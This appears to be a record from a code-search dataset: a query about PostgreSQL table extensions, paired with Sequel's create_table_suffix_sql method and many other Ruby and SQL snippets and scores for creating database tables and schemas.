"def create\n if @db.table_info(METADATA_TABLE_NAME).empty?\n stmt = \"CREATE TABLE #{METADATA_TABLE_NAME} (key VARCHAR(1024), val VARCHAR(8192), env VARCHAR(255))\"\n @db.execute(stmt)\n end\n\n if @db.table_info(RUN_HISTORY_TABLE_NAME).empty?\n stmt = \"CREATE TABLE #{RUN_HISTORY_TABLE_NAME} (name VARCHAR(1024), outcome VARCHAR(16), env VARCHAR(255), time DATETIME)\"\n @db.execute(stmt)\n\n index_stmt = \"CREATE INDEX index_run_history ON #{RUN_HISTORY_TABLE_NAME} (time DESC)\"\n @db.execute(index_stmt)\n end\n\n if @db.table_info(DISABLED_MONITOR_TABLE_NAME).empty?\n stmt = \"CREATE TABLE #{DISABLED_MONITOR_TABLE_NAME} (name VARCHAR(1024), env VARCHAR(255))\"\n @db.execute(stmt)\n end\n\n if @db.table_info(MONITOR_INFO_TABLE_NAME).empty?\n stmt = \"CREATE TABLE #{MONITOR_INFO_TABLE_NAME} (name VARCHAR(1024), description VARCHAR(8192))\"\n @db.execute(stmt)\n end\n end",
"def createTaskTable\n @Handle.execute( @TaskSchema ) \n end",
"def create_films_table\n @db.execute(\"DROP TABLE Films\")\n @db.execute(<<EOF\nCREATE TABLE films (\n title VARCHAR(200),\n date DATETIME,\n channel VARCHAR(200),\n start_time TIME,\n end_time TIME,\n year NUMBER,\n description TEXT,\n duration NUMBER,\n PRIMARY KEY(title, date, channel)\n);\nEOF\n )\nend",
"def add_select_into_table(new_table_name, sql_query)\n \"CREATE TABLE #{new_table_name} \" + sql_query\n end",
"def create_table(table, **kwargs, &block)\n current_instructions << Instructions::CreateTable.new(\n **kwargs,\n table: table,\n columns_block: block,\n )\n end",
"def createUserTable\n @Handle.execute( @UserSchema ) \n end",
"def create_database(name, options = {})\n execute(\n \"CREATE SCHEMA #{quote_table_name(name)}\",\n SCHEMA_LOG_NAME\n )\n end",
"def createurlTable\n @conn.exec(\"CREATE TABLE urls (uid serial NOT NULL, loc character varying(255), CONSTRAINT urls_pkey PRIMARY KEY (uid)) WITH (OIDS=FALSE);\");\n end",
"def new_table(name, field_defs, encrypt, record_class)\r\n # Header rec consists of last record no. used, delete count, and\r\n # all field names/types. Here, I am inserting the 'recno' field\r\n # at the beginning of the fields.\r\n header_rec = ['000000', '000000', record_class, 'recno:Integer',\r\n field_defs].join('|')\r\n\r\n header_rec = 'Z' + encrypt_str(header_rec) if encrypt\r\n\r\n begin\r\n fptr = open(File.join(@db.path, name.to_s + @db.ext), 'w')\r\n fptr.write(header_rec + \"\\n\")\r\n ensure\r\n fptr.close\r\n end\r\n end",
"def create_schema(schema)\n execute \"CREATE SCHEMA #{schema}\", 'Create Schema'\n end",
"def define_table(table_name, columns, force)\n if !db_connection.table_exists?(table_name) || force\n db_connection.create_table(table_name, force: true) do |t|\n columns.each do |name, type|\n t.send(type, name)\n end\n end\n end\n end",
"def create_table(table)\r\n if get_tables.include?(table)\r\n puts \"#{table} already exists.\"\r\n else\r\n create_table_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS #{table}(\r\n id INTEGER PRIMARY KEY\r\n SQL\r\n puts \"The table \\'#{table}\\' is now being created.\"\r\n puts \"Let's create the first column!\"\r\n while true\r\n create_table_cmd = add_column(create_table_cmd)\r\n puts \"would you like to add another column?\"\r\n break if get_response == 'no'\r\n end\r\n puts \"Would you like to add a column that references another table?\"\r\n create_table_cmd = add_foreign_keys(create_table_cmd, table) if get_response == 'yes'\r\n create_table_cmd += \");\"\r\n @db.execute(create_table_cmd)\r\n puts \"The table #{table} has been created.\"\r\n end\r\n end",
"def create_pruned_table(conn)\n if !conn.list_tables.include?('pruned')\n query = \"CREATE TABLE `pruned` ( `table_name` VARCHAR(64) NOT NULL PRIMARY KEY, `prune_time` DATETIME NOT NULL )\"\n if @dry_run\n verbose query\n else\n conn.query query\n end\n end\n end",
"def create(tableName, args)\n now = Time.now \n # Pass table name and an array of Hashes. Later, test the last\n # array to see if its table options rather than column family spec.\n raise TypeError.new(\"Table name must be of type String\") \\\n unless tableName.instance_of? String\n # For now presume all the rest of the args are column family\n # hash specifications. TODO: Add table options handling.\n htd = Java::OrgApacheHadoopHbase::HTableDescriptor.new(tableName)\n for arg in args\n if arg.instance_of? String\n htd.addFamily(Java::OrgApacheHadoopHbase::HColumnDescriptor.new(makeColumnName(arg)))\n else\n raise TypeError.new(arg.class.to_s + \" of \" + arg.to_s + \" is not of Hash type\") \\\n unless arg.instance_of? Hash\n htd.addFamily(hcd(arg))\n end\n end\n @admin.createTable(htd)\n end"
] |
[
"0.7415012",
"0.72220755",
"0.7216366",
"0.7109741",
"0.70924604",
"0.7069454",
"0.7053471",
"0.7051891",
"0.70443887",
"0.70225674",
"0.6937419",
"0.6934067",
"0.6926212",
"0.68763155",
"0.6873812",
"0.6843173",
"0.68393475",
"0.6811212",
"0.68088245",
"0.672029",
"0.66978526",
"0.66966957",
"0.66939723",
"0.6648195",
"0.66194695",
"0.661876",
"0.6553903",
"0.65321386",
"0.6527483",
"0.65170705",
"0.6495914",
"0.64946234",
"0.6490551",
"0.64899147",
"0.6477656",
"0.64686096",
"0.6461675",
"0.64548874",
"0.6453056",
"0.6442504",
"0.6425454",
"0.64215106",
"0.6421322",
"0.64098275",
"0.64093584",
"0.6404908",
"0.6400859",
"0.639014",
"0.63787735",
"0.63775223",
"0.63734925",
"0.634473",
"0.63405937",
"0.6322195",
"0.6322154",
"0.6311097",
"0.631003",
"0.62728155",
"0.62725943",
"0.6272568",
"0.62717813",
"0.6250932",
"0.62493414",
"0.6221908",
"0.6208916",
"0.6201232",
"0.6191322",
"0.61697936",
"0.6166806",
"0.61657923",
"0.61422133",
"0.61287075",
"0.6125567",
"0.6118668",
"0.61182773",
"0.6098779",
"0.60923195",
"0.60907376",
"0.60761017",
"0.60750484",
"0.604912",
"0.60401446",
"0.60288644",
"0.6026149",
"0.60258996",
"0.6023665",
"0.60193825",
"0.60118353",
"0.59930915",
"0.59920186",
"0.59839165",
"0.5982744",
"0.59825",
"0.5979823",
"0.59782636",
"0.59605104",
"0.5950756",
"0.5947432",
"0.59401053",
"0.5939742"
] |
0.672513
|
19
|
Handle various PostgreSQL-specific table extensions such as inheritance, partitioning, tablespaces, and foreign tables.
|
def create_table_suffix_sql(name, options)
sql = String.new
if inherits = options[:inherits]
sql << " INHERITS (#{Array(inherits).map{|t| quote_schema_table(t)}.join(', ')})"
end
if partition_by = options[:partition_by]
sql << " PARTITION BY #{options[:partition_type]||'RANGE'} #{literal(Array(partition_by))}"
end
if on_commit = options[:on_commit]
raise(Error, "can't provide :on_commit without :temp to create_table") unless options[:temp]
raise(Error, "unsupported on_commit option: #{on_commit.inspect}") unless ON_COMMIT.has_key?(on_commit)
sql << " ON COMMIT #{ON_COMMIT[on_commit]}"
end
if tablespace = options[:tablespace]
sql << " TABLESPACE #{quote_identifier(tablespace)}"
end
if server = options[:foreign]
sql << " SERVER #{quote_identifier(server)}"
if foreign_opts = options[:options]
sql << " OPTIONS (#{foreign_opts.map{|k, v| "#{k} #{literal(v.to_s)}"}.join(', ')})"
end
end
sql
end
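# Illustrative usage -- a minimal sketch, not part of the adapter source.
# Assumptions: DB is a hypothetical Sequel::Database connected to PostgreSQL,
# and every table/column/tablespace/server name below is made up. Each
# create_table option maps onto one clause appended by create_table_suffix_sql.
require 'sequel'
DB = Sequel.connect('postgres://localhost/example') # hypothetical URL

# INHERITS ("cities")
DB.create_table(:capitals, inherits: :cities){String :state}

# PARTITION BY RANGE ("logdate") -- :partition_type defaults to RANGE
DB.create_table(:measurements, partition_by: :logdate) do
  Date :logdate
  Integer :peaktemp
end

# ON COMMIT DROP -- only valid together with :temp, as the guard above enforces
DB.create_table(:scratch, temp: true, on_commit: :drop){Integer :n}

# TABLESPACE "fastspace"
DB.create_table(:archive, tablespace: :fastspace){Integer :n}

# SERVER "remote_srv" OPTIONS (schema_name 'public') -- a foreign table
DB.create_table(:remote_items, foreign: :remote_srv, options: {schema_name: 'public'}){Integer :n}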
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def extended_table(extra = nil, **opt)\n sql = sql_extended_table(extra, **opt)\n ActiveRecord::Base.connection.exec_query(sql)\n end",
"def inherited_tables\n tables = query(<<-SQL, 'SCHEMA')\n SELECT child.relname AS table_name,\n array_agg(parent.relname) AS inheritances\n FROM pg_inherits\n JOIN pg_class parent ON pg_inherits.inhparent = parent.oid\n JOIN pg_class child ON pg_inherits.inhrelid = child.oid\n GROUP BY child.relname, pg_inherits.inhrelid\n ORDER BY pg_inherits.inhrelid\n SQL\n\n tables.map do |(table, refs)|\n [table, Coder.decode(refs)]\n end.to_h\n end",
"def additional_support_tables\n additional_tables.map { |scale| OVERLAY_TABLENAME % [scale, table_name] }\n end",
"def additional_support_tables\n additional_tables.map { |scale| OVERLAY_TABLENAME % [scale, table_name] }\n end",
"def revise_table\n name = @table_extension.name\n @table_extension.extended.each do |method_name|\n define_extension_setter(name, method_name)\n define_extension_getter(name, method_name)\n define_extension_dirty(name, method_name)\n end\n @table_extension.mirrored.each do |method_name|\n define_extension_mirror_setter(name, method_name)\n end\n true\n end",
"def table_name_prefix\n \"ext_#{self.registered_name.to_s.underscore}_\"\n end",
"def create_extension_view_and_class\n self.const_get(\"Extended#{to_s}\")\n rescue\n clause = view_builder\n #this needs to be moved into the specific db adapter files\n connection.execute %{\n create or replace algorithm = merge SQL SECURITY DEFINER view #{extended_table_name} as select #{clause[:view_select]} from #{table_name} #{clause[:view_joins]}#{clause[:view_conditions]}\n }\n class_eval %{\n class Extended#{to_s} < #{to_s}\n set_table_name \"#{extended_table_name}\"\n def self.descends_from_active_record?\n true\n end\n end\n }\n true\n end",
"def create_table_with_inherits(table_name, options = {}, &block)\n options[:primary_key] = \"#{options[:inherits]}_id\" if options[:inherits]\n\n create_table_without_inherits(table_name, options) do |table_defintion|\n yield table_defintion \n end \n end",
"def table_name; \"gdo_module\"; end",
"def table_name_prefix; end",
"def pg_table_name\n table_name\n end",
"def table_schema(tbl)\n column_sql = <<-eosql\nSELECT rf.rdb$field_name AS \"name\",\n field.rdb$field_type AS \"type_code\",\n field.rdb$field_sub_type AS \"subtype_code\",\n-- -- -- field.rdb$field_length AS \"length\", -- -- --\n field.rdb$field_precision AS \"precision\",\n field.rdb$field_scale AS \"scale\",\n CASE\n WHEN rf.rdb$null_flag > 0\n THEN 'NO'\n ELSE 'YES'\n END AS \"nullable\",\n CASE\n WHEN iseg.rdb$index_name IS NOT NULL\n THEN 'YES'\n ELSE 'NO'\n END AS \"primary_key\"\nFROM rdb$relation_fields rf\nJOIN rdb$fields field ON rf.rdb$field_source = field.rdb$field_name\nLEFT JOIN rdb$relation_constraints c\n ON c.rdb$relation_name = rf.rdb$relation_name\n AND\n c.rdb$constraint_type = 'PRIMARY KEY'\nLEFT JOIN rdb$index_segments iseg\n ON iseg.rdb$index_name = c.rdb$index_name\n AND\n iseg.rdb$field_name = rf.rdb$field_name\nWHERE rf.rdb$relation_name = ?\nORDER BY rf.rdb$field_position, rf.rdb$field_name\neosql\n\n info = RDBI::Schema.new([], [])\n res = execute(column_sql, tbl.to_s.upcase)\n res.as(:Struct)\n while row = res.fetch[0]\n type = RDBI::Driver::Rubyfb::Types::field_type_to_rubyfb(row[:type_code], row[:subtype_code])\n info.columns << RDBI::Column.new(\n row[:name].to_sym,\n type,\n RDBI::Driver::Rubyfb::Types::rubyfb_to_rdbi(type, row[:scale]),\n row[:precision],\n row[:scale],\n row[:nullable] == 'YES',\n #nil, # metadata\n #nil, # default\n #nil, # table\n )\n (info.columns[-1].primary_key = row[:primary_key] == 'YES') rescue nil # pk > rdbi 0.9.1\n end\n return unless info.columns.length > 0\n info.tables << tbl\n info\n end",
"def quoted_table_name\n case self.connection.adapter_name\n when 'PostgreSQL'\n original_quoted_table_name.downcase\n else\n original_quoted_table_name\n end\n end",
"def extend_sql_avoiding_table_naming_clashes!(sql, addition)\r\n used_table_aliases = table_aliases_from_join_fragment(addition)\r\n old_table_aliases = table_aliases_from_join_fragment(sql)\r\n (used_table_aliases & old_table_aliases).each do |join_table_alias|\r\n i = 0\r\n begin\r\n i += 1\r\n new_alias = \"renamed_join_table_#{i}\"\r\n end until !used_table_aliases.include?(new_alias)\r\n convert_table_name_to_new_alias!(sql, join_table_alias, new_alias)\r\n end\r\n sql << \" #{addition} \"\r\n end",
"def test_table_metadata_contains_extensions\n skip(\"The extensions property on a table was introduced in Cassandra 3.0\") if CCM.cassandra_version < '3.0.0'\n\n assert @cluster.keyspace('simplex').has_table?('users')\n table_meta = @cluster.keyspace('simplex').table('users')\n assert_empty table_meta.options.extensions\n end",
"def copy_polymorphic_tables\n self.polymorphic_tables.each do |t|\n polymorphic_id_col, polymorphic_type_col = \"#{t.polymorphic_as}_id\", \"#{t.polymorphic_as}_type\"\n sql_connection.select_rows(t.sql_name) do |rows, page, total_pages|\n Mongify::Status.publish('copy_polymorphic', :size => rows.count, :name => \"Polymorphicizing #{t.name}\", :action => 'add')\n rows.each do |row|\n\n #If no data is in the column, skip importing\n if (row[polymorphic_type_col])\n table_name = row[polymorphic_type_col].tableize\n new_id = no_sql_connection.get_id_using_pre_mongified_id(table_name, get_type_casted_value(t, polymorphic_id_col, row))\n end\n\n row = t.translate(row)\n row[polymorphic_id_col] = new_id if new_id\n row.merge!(fetch_reference_ids(t, row))\n row.delete('pre_mongified_id')\n\n if t.embedded? && table_name\n row.delete(polymorphic_id_col)\n row.delete(polymorphic_type_col)\n save_function_call = t.embedded_as_object? ? '$set' : '$addToSet'\n no_sql_connection.update(table_name, new_id, {save_function_call => {t.name => row}})\n else\n no_sql_connection.insert_into(t.name, row)\n end\n\n Mongify::Status.publish('copy_polymorphic')\n end\n Mongify::Status.publish('copy_polymorphic', :action => 'finish')\n end\n end\n end",
"def real_table_name\n packageid.gsub('.', '_')\n end",
"def create_tables_in_test_schema\n ActiveRecord::Schema.define(version: 1) do\n ActiveRecord::Base.connection.ddl_batch do\n create_table :all_types, id: { limit: 8 } do |t|\n t.column :col_string, :string\n t.column :col_int64, :bigint\n t.column :col_float64, :float\n t.column :col_numeric, :numeric\n t.column :col_bool, :boolean\n t.column :col_bytes, :binary\n t.column :col_date, :date\n t.column :col_timestamp, :datetime\n t.column :col_json, :json\n\n t.column :col_array_string, :string, array: true\n t.column :col_array_int64, :bigint, array: true\n t.column :col_array_float64, :float, array: true\n t.column :col_array_numeric, :numeric, array: true\n t.column :col_array_bool, :boolean, array: true\n t.column :col_array_bytes, :binary, array: true\n t.column :col_array_date, :date, array: true\n t.column :col_array_timestamp, :datetime, array: true\n t.column :col_array_json, :json, array: true\n end\n\n create_table :firms do |t|\n t.string :name\n t.integer :rating\n t.string :description\n t.references :account\n end\n\n create_table :customers do |t|\n t.string :name\n end\n\n create_table :accounts do |t|\n t.references :customer, index: false\n t.references :firm, index: false\n t.string :name\n t.integer :credit_limit\n t.integer :transactions_count\n end\n\n create_table :transactions do |t|\n t.float :amount\n t.references :account, index: false\n end\n\n create_table :departments do |t|\n t.string :name\n t.references :resource, polymorphic: true, index: { name: \"index_departments_on_resource\" }\n end\n\n create_table :member_types do |t|\n t.string :name\n end\n\n create_table :members do |t|\n t.string :name\n t.references :member_type, index: false\n t.references :admittable, polymorphic: true, index: false\n end\n\n create_table :memberships do |t|\n t.datetime :joined_on\n t.references :club, index: false\n t.references :member, index: false\n t.boolean :favourite\n end\n\n create_table :clubs do |t|\n t.string :name\n end\n\n create_table :authors do |t|\n t.string :name, null: false\n t.date :registered_date\n t.references :organization, index: false\n end\n\n create_table :posts do |t|\n t.string :title\n t.string :content\n t.references :author\n t.integer :comments_count\n t.date :post_date\n t.time :published_time\n end\n\n create_table :comments do |t|\n t.string :comment\n t.references :post, index: false, foreign_key: true\n end\n\n create_table :addresses do |t|\n t.string :line1\n t.string :postal_code\n t.string :city\n t.references :author, index: false\n end\n\n create_table :organizations do |t|\n t.string :name\n t.datetime :last_updated, allow_commit_timestamp: true\n end\n\n create_table :singers, id: false do |t|\n t.primary_key :singerid\n t.column :first_name, :string, limit: 200\n t.string :last_name\n t.integer :tracks_count\n t.integer :lock_version\n t.virtual :full_name, type: :string, as: \"COALESCE(first_name || ' ', '') || last_name\", stored: true\n end\n\n create_table :albums, id: false do |t|\n t.interleave_in :singers\n t.primary_key :albumid\n # `singerid` is part of the primary key in the table definition, but it is not visible to ActiveRecord as part of\n # the primary key, to prevent ActiveRecord from considering this to be an entity with a composite primary key.\n t.parent_key :singerid\n t.string :title\n t.integer :lock_version\n end\n\n create_table :tracks, id: false do |t|\n # `:cascade` causes all tracks that belong to an album to automatically be deleted when an album is deleted.\n t.interleave_in :albums, :cascade\n 
t.primary_key :trackid\n t.parent_key :singerid\n t.parent_key :albumid\n t.string :title\n t.numeric :duration\n t.integer :lock_version\n end\n\n add_index :tracks, [:singerid, :albumid, :title], interleave_in: :albums, null_filtered: true, unique: false\n\n end\n end\nend",
"def table_name\n must_be_defined_in_derived_class\n end",
"def tables(opts=OPTS, &block)\n pg_class_relname(['r', 'p'], opts, &block)\n end",
"def extended_types\n EXTENDED_DATABASE_TYPES\n end",
"def create_table\n raise \"Need to implement abstract method.\" \n end",
"def schema_parse_table(table_name, opts)\n m = output_identifier_meth(opts[:dataset])\n\n _schema_ds.where_all(Sequel[:pg_class][:oid]=>regclass_oid(table_name, opts)).map do |row|\n row[:default] = nil if blank_object?(row[:default])\n if row[:base_oid]\n row[:domain_oid] = row[:oid]\n row[:oid] = row.delete(:base_oid)\n row[:db_domain_type] = row[:db_type]\n row[:db_type] = row.delete(:db_base_type)\n else\n row.delete(:base_oid)\n row.delete(:db_base_type)\n end\n\n db_type = row[:db_type]\n row[:type] = if row.delete(:is_array)\n schema_array_type(db_type)\n else\n send(TYPTYPE_METHOD_MAP[row.delete(:typtype)], db_type)\n end\n identity = row.delete(:attidentity)\n if row[:primary_key]\n row[:auto_increment] = !!(row[:default] =~ /\\A(?:nextval)/i) || identity == 'a' || identity == 'd'\n end\n\n # :nocov:\n if server_version >= 90600\n # :nocov:\n case row[:oid]\n when 1082\n row[:min_value] = MIN_DATE\n row[:max_value] = MAX_DATE\n when 1184, 1114\n if Sequel.datetime_class == Time\n row[:min_value] = MIN_TIMESTAMP\n row[:max_value] = MAX_TIMESTAMP\n end\n end\n end\n\n [m.call(row.delete(:name)), row]\n end\n end",
"def schema\n execute(<<-eosql).collect { |row| row[0] }.collect { |t| table_schema(t) }\nSELECT rdb$relation_name FROM rdb$relations WHERE rdb$system_flag != 1\neosql\n end",
"def copy_table_structure(rdb,tbl)\n template = \"SELECT sql, type from X.sqlite_master WHERE tbl_name = ? ORDER BY type DESC\"\n lsql = template.gsub('X',\"main\")\n rsql = template.gsub('X',quote_with_dots(rdb))\n args = [quote_with_dots(tbl)]\n lschema = sqlite_execute(lsql,args)\n rschema = sqlite_execute(rsql,args)\n if lschema.length>0\n return false\n end\n rschema.each{ |row| sqlite_execute(row[0],[]) }\n true\n end",
"def copy_table_structure(rdb,tbl)\n template = \"SELECT sql, type from X.sqlite_master WHERE tbl_name = ? ORDER BY type DESC\"\n lsql = template.gsub('X',\"main\")\n rsql = template.gsub('X',quote_with_dots(rdb))\n args = [quote_with_dots(tbl)]\n lschema = sqlite_execute(lsql,args)\n rschema = sqlite_execute(rsql,args)\n if lschema.length>0\n return false\n end\n rschema.each{ |row| sqlite_execute(row[0],[]) }\n true\n end",
"def copy_table_structure(rdb,tbl)\n template = \"SELECT sql, type from X.sqlite_master WHERE tbl_name = ? ORDER BY type DESC\"\n lsql = template.gsub('X',\"main\")\n rsql = template.gsub('X',quote_with_dots(rdb))\n args = [quote_with_dots(tbl)]\n lschema = sqlite_execute(lsql,args)\n rschema = sqlite_execute(rsql,args)\n if lschema.length>0\n return false\n end\n rschema.each{ |row| sqlite_execute(row[0],[]) }\n true\n end",
"def add_piggy_back_sql_data!(reflection_name, prefix, table_alias, attributes, select, joins, conditions, join_type)\n ktn = table_name\n kpkey = primary_key\n reflection = reflections[reflection_name]\n atn = reflection.table_name\n attributes.each do |attr|\n if table_alias\n select << \", #{table_alias}.#{attr} AS #{prefix}_#{attr}\"\n else\n select << \", #{atn}.#{attr} AS #{prefix}_#{attr}\"\n end\n end\n fkey = reflection.primary_key_name\n fpkey = reflection.klass.primary_key\n\n case reflection.macro\n when :belongs_to\n if table_alias\n joins << \" #{join_type} JOIN #{atn} #{table_alias} ON #{table_alias}.#{fpkey}=#{ktn}.#{fkey} \"\n else\n joins << \" #{join_type} JOIN #{atn} ON #{atn}.#{fpkey}=#{ktn}.#{fkey} \"\n end\n when :has_one\n if table_alias\n joins << \" #{join_type} JOIN #{atn} #{table_alias} ON #{table_alias}.#{fkey}=#{ktn}.#{kpkey} \"\n else\n joins << \" #{join_type} JOIN #{atn} ON #{atn}.#{fkey}=#{ktn}.#{kpkey} \"\n end\n when :has_many\n raise \"piggy_back: aliasing not implemented for has_many\" if table_alias\n if reflection.options[:through]\n ttn = reflection.through_reflection.klass.table_name\n tkfkey = reflection.through_reflection.primary_key_name\n tafkey = reflection.source_reflection.primary_key_name\n\n through_conditions = reflection.options[:conditions] ?\n \" AND \" + reflection.options[:conditions] : \"\"\n source_conditions = reflection.through_reflection.options[:conditions] ?\n \" AND \" + reflection.through_reflection.options[:conditions] : \"\"\n\n joins << \" LEFT JOIN #{ttn} ON (#{ttn}.#{tkfkey}=#{ktn}.#{kpkey}#{through_conditions})\"\n joins << \" LEFT JOIN #{atn} ON (#{ttn}.#{tafkey}=#{atn}.#{fpkey}#{source_conditions}) \"\n else\n reflection_conditions = reflection.options[:conditions] ?\n \" AND \" + reflection.options[:conditions] : \"\"\n\n joins << \" LEFT JOIN #{atn} ON (#{atn}.#{fkey}=#{ktn}.#{kpkey}#{reflection_conditions}) \"\n end\n else\n raise \"can't piggy back #{reflection.macro} on class #{klass}\"\n end\n end",
"def table_filter(schemaName, tblName, tblType)\n [\"information_schema\", \"pg_catalog\"].include?(schemaName) || tblType !~ /TABLE/i\n end",
"def schema_ds_filter(table_name, opts)\n if table_name\n [{:c__table_name=>table_name.to_s}]\n else\n [{:t__table_type=>'BASE TABLE'}]\n end\n end",
"def on_table?; @on_table; end",
"def replace_tables_text(v)\n t = sanitize_sql(v)\n (table_extended_with.collect(&:table) | [table_name]).each do |cur_tab|\n t.gsub!(/(\\W|\\A)#{cur_tab}(\\W)/i) {\"#{$1}#{extended_table_name}#{$2}\"}\n end\n t\n end",
"def aliased_table_name_for_with_sqlserver_support(name,suffix=nil)\n if !parent.table_joins.blank? && parent.table_joins.to_s.downcase =~ %r{join(\\s+\\w+)?\\s+#{Regexp.escape(active_record.connection.quote_table_name(name.downcase))}\\son}i\n @join_dependency.table_aliases[name] += 1\n end\n unless @join_dependency.table_aliases[name].zero?\n # if the table name has been used, then use an alias\n name = active_record.connection.table_alias_for \"#{pluralize(reflection.name)}_#{parent_table_name}#{suffix}\"\n table_index = @join_dependency.table_aliases[name]\n @join_dependency.table_aliases[name] += 1\n name = name[0..active_record.connection.table_alias_length-3] + \"_#{table_index+1}\" if table_index > 0\n else\n @join_dependency.table_aliases[name] += 1\n end\n name\n end",
"def find_column_and_table(path, base)\n if path.length > 1\n find_column_and_table(path[1..-1], base.reflect_on_association(path.first.to_sym).class_name.constantize)\n else\n [base.columns_hash[path.first.to_s], base]\n end\n end",
"def supports_indexes_on_partitioned_tables?\n postgresql_version >= 110_000\n end",
"def tables\n [\n ]\n end",
"def load_table_schema(conn, builder, table)\n builder.relvar(table){\n primary_key_columns = load_table_heading(conn, builder, table)\n load_table_constraints(conn, builder, table, primary_key_columns)\n }\n end",
"def quote_identifier_append(sql, name)\n name = (table_mappings[name.to_sym] || name) if name.respond_to?(:to_sym)\n super(sql, name)\n end",
"def schema_ds_from(table_name, opts)\n [:information_schema__tables___t]\n end",
"def combine_polymorphic_foreign_keys\n @index_columns.each do |_table, foreign_keys|\n foreign_id_keys = foreign_keys.select { |key| key.size == 1 && key.first =~ /_id/ }\n foreign_type_keys = foreign_keys.select { |key| key.size == 1 && key.first =~ /_type/ }\n foreign_id_keys.each do |id_key|\n next unless type_key =\n foreign_type_keys.detect { |type_key| type_key.first == id_key.first.sub(/_id/, '') + '_type' }\n\n foreign_keys.delete(id_key)\n foreign_keys.delete(type_key)\n foreign_keys << id_key + type_key\n end\n end\n end",
"def ignored_translation_table_colums(klass); end",
"def schema_and_table_name\n if qualified_table_name.include? '.'\n schema_name, table_name = qualified_table_name.split('.', 2)\n else\n table_name = qualified_table_name\n schema_name = self.class.default_schema_name\n end\n [schema_name, table_name]\n end",
"def parent_tables(table_name)\n result = exec_query(<<-SQL, 'SCHEMA')\n SELECT pg_namespace.nspname, pg_class.relname\n FROM pg_catalog.pg_inherits\n INNER JOIN pg_catalog.pg_class ON (pg_inherits.inhparent = pg_class.oid)\n INNER JOIN pg_catalog.pg_namespace ON (pg_class.relnamespace = pg_namespace.oid)\n WHERE inhrelid = '#{table_name}'::regclass\n SQL\n result.map { |a| a['relname'] }\n end",
"def import_table( table )\n # This must come first, so we can exclude foreign key indexes later.\n import_foreign_keys( table )\n import_indexes( table )\n import_columns( table )\n end",
"def add_tables_to_publication(name, tables)\n typed_exec(\"ALTER PUBLICATION #{connection.quote_ident(name)} ADD TABLE #{safe_list(tables)}\")\n end",
"def get_table(object)\n raise NotImplementedError, \"Subclasses must implement private method get_table\"\n end",
"def table_prefix component, use_table_name = nil\n case use_table_name\n when false, nil\n ''\n when true\n safe_table_name(component)+'.'\n else\n use_table_name+'.'\n end\n end",
"def tablename; datastore['TABLENAME']; end",
"def create_tables\n DB.create_table? :event_templates do\n primary_key :id, :type => :uuid\n String :title, :unique=>true\n String :duration\n String :description\n String :status\n end\n\n DB.create_table? :events do\n primary_key :id, :type => :uuid\n foreign_key :event_template_id, :type => :uuid\n String :title\n String :duration\n String :description\n String :date\n String :start_time\n String :timezone\n String :cohort\n Integer :cohort_id\n String :income_amount\n String :income_currency\n String :utc_time\n\n end\n\n DB.create_table? :coaches do\n primary_key :id\n String :name\n String :email\n String :image\n String :status\n end\n\n DB.create_table? :assigned_coaches do\n primary_key :id\n foreign_key :event_id, :type => :uuid\n foreign_key :coach_id\n end\n\n DB.create_table? :coach_fees do\n primary_key :id\n foreign_key :event_template_id, :type => :uuid\n foreign_key :event_id, :type => :uuid\n String :currency\n String :amount\n end\n\n DB.create_table? :timezones do\n primary_key :id\n String :name\n end\n\n DB.create_table? :cohorts do\n primary_key :id\n String :name\n String :status\n end\n\nend",
"def createTaxonTables(conn)\n\n\tconn.exec(\"DROP TABLE geo.ocorrencias;\")\n\tconn.exec(\"DROP TABLE geo.especies;\")\n\n\n\t## Table: geo.especies\n\tconn.exec(\"CREATE TABLE geo.especies\n\t\t\t(id integer NOT NULL,\n\t\t\t familia character varying(50) DEFAULT NULL::character varying,\n\t\t\t genero character varying(50) DEFAULT NULL::character varying,\n\t\t\t especie character varying(50) DEFAULT NULL::character varying,\n\t\t\t tipo character varying(50) DEFAULT NULL::character varying,\n\t\t\t infranome character varying(50) DEFAULT NULL::character varying,\n\t\t\t autor character varying(100) DEFAULT NULL::character varying,\n\t\t\t id_fb character varying(255),\n\t\t\t lifeform_fb character varying(255),\n\t\t\t CONSTRAINT especies_pkey PRIMARY KEY (id));\")\n\tconn.exec(\"ALTER TABLE geo.especies OWNER TO cncflora;\")\n\n\n\t## Table: geo.ocorrencias\n\tconn.exec(\"CREATE TABLE geo.ocorrencias\n\t\t\t(codigocncflora serial NOT NULL,\n\t\t\t id integer,\n\t\t\t codigocolecao character varying(25) DEFAULT NULL::character varying,\n\t\t\t familia character varying(50) DEFAULT NULL::character varying,\n\t\t\t genero character varying(50) DEFAULT NULL::character varying,\n\t\t\t especie character varying(50) DEFAULT NULL::character varying,\n\t\t\t tipo character varying(10) DEFAULT NULL::character varying,\n\t\t\t infranome character varying(50) DEFAULT NULL::character varying,\n\t\t\t numerocatalogo character varying(15) DEFAULT NULL::character varying,\n\t\t\t numerocoletor character varying(15) DEFAULT NULL::character varying,\n\t\t\t coletor character varying(255) DEFAULT NULL::character varying,\n\t\t\t anocoleta character varying(10) DEFAULT NULL::character varying,\n\t\t\t mescoleta character varying(10) DEFAULT NULL::character varying,\n\t\t\t diacoleta character varying(10) DEFAULT NULL::character varying,\n\t\t\t determinador character varying(255) DEFAULT NULL::character varying,\n\t\t\t estado character varying(255) DEFAULT NULL::character varying,\n\t\t\t municipio character varying(255) DEFAULT NULL::character varying,\n\t\t\t localidade text,\n\t\t\t longitude double precision DEFAULT 0::double precision,\n\t\t\t latitude double precision DEFAULT 0::double precision,\n\t\t\t longcncflora double precision DEFAULT 0::double precision,\n\t\t\t latcncflora double precision DEFAULT 0::double precision,\n\t\t\t preccncflora character varying(50) DEFAULT NULL::character varying,\n\t\t\t metodocncflora character varying(50) DEFAULT NULL::character varying,\n\t\t\t obscncflora text,\n\t\t\t revisado smallint DEFAULT 0::smallint,\n\t\t\t valido smallint DEFAULT 0::smallint,\n\t\t\t longitudegis double precision DEFAULT 0::double precision,\n\t\t\t latitudegis double precision DEFAULT 0::double precision,\n\t\t\t geom geometry(Point,102033),\n\t\t\t CONSTRAINT ocorrencias_pkey PRIMARY KEY (codigocncflora),\n\t\t\t CONSTRAINT ocorrencias_id_fkey FOREIGN KEY (id) REFERENCES geo.especies (id));\")\n\tconn.exec(\"ALTER TABLE geo.ocorrencias OWNER TO cncflora;\")\nend",
"def table; end",
"def table; end",
"def table; end",
"def table; end",
"def table_name\n @table_name ||= (superclass == SmallRecord::Base) ? default_table_name : superclass.table_name\n end",
